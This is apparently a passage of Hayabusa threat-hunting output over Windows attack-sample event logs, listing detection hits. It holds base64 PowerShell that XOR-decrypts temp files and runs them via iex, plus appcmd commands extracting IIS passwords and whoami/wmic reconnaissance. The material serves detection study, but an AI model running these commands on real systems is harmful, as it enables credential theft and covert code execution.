kAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3756 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EF9EFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.742 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". 
)"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3812 | PGUID: 365ABB72-3D6E-5CEB-0000-0010AFA2FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.822 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1876 | PGUID: 365ABB72-3D6E-5CEB-0000-00106FA6FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.893 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3304 | PGUID: 365ABB72-3D6E-5CEB-0000-00102FAAFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.973 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password | 
Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2276 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EFADFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.063 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1508 | PGUID: 365ABB72-3D6F-5CEB-0000-0010A6B1FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.143 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2796 | PGUID: 365ABB72-3D6F-5CEB-0000-001066B5FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.233 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | 
Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1036 | PGUID: 365ABB72-3D6F-5CEB-0000-001026B9FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.323 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwB
jAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 168 | PGUID: 365ABB72-3D6F-5CEB-0000-00108FBFFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.403 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2484 | PGUID: 
365ABB72-3D6F-5CEB-0000-00104FC3FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.473 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2168 | PGUID: 365ABB72-3D6F-5CEB-0000-00100FC7FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.563 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3892 | PGUID: 365ABB72-3D6F-5CEB-0000-0010CFCAFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.784 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3844 | PGUID: 
365ABB72-3D6F-5CEB-0000-0010F2CFFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.894 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3848 | PGUID: 365ABB72-3D6F-5CEB-0000-0010B2D3FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.964 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3640 | PGUID: 365ABB72-3D6F-5CEB-0000-001072D7FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.034 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1900 | PGUID: 
365ABB72-3D6F-5CEB-0000-001032DBFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.124 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2772 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2DEFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.204 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2108 | PGUID: 365ABB72-3D70-5CEB-0000-0010B2E2FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.305 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2640 | PGUID: 
365ABB72-3D70-5CEB-0000-001072E6FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.435 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1004 | PGUID: 365ABB72-3D70-5CEB-0000-001032EAFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.555 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 4012 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2EDFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-28 00:12:38.241 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c whoami /groups | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3256 | PGUID: 365ABB72-FE66-5CEB-0000-001058F50B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami /groups | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c whoami /groups | LID: 0x3e7 | PID: 1168 | PGUID: 365ABB72-FE66-5CEB-0000-0010C7F80B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami as 
SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:43.990 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-FE6B-5CEB-0000-00102A090C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:44.055 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | LID: 0x3e7 | PID: 3520 | PGUID: 365ABB72-FE6C-5CEB-0000-0010050C0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:44.055 +09:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote Services,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:45.405 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe 
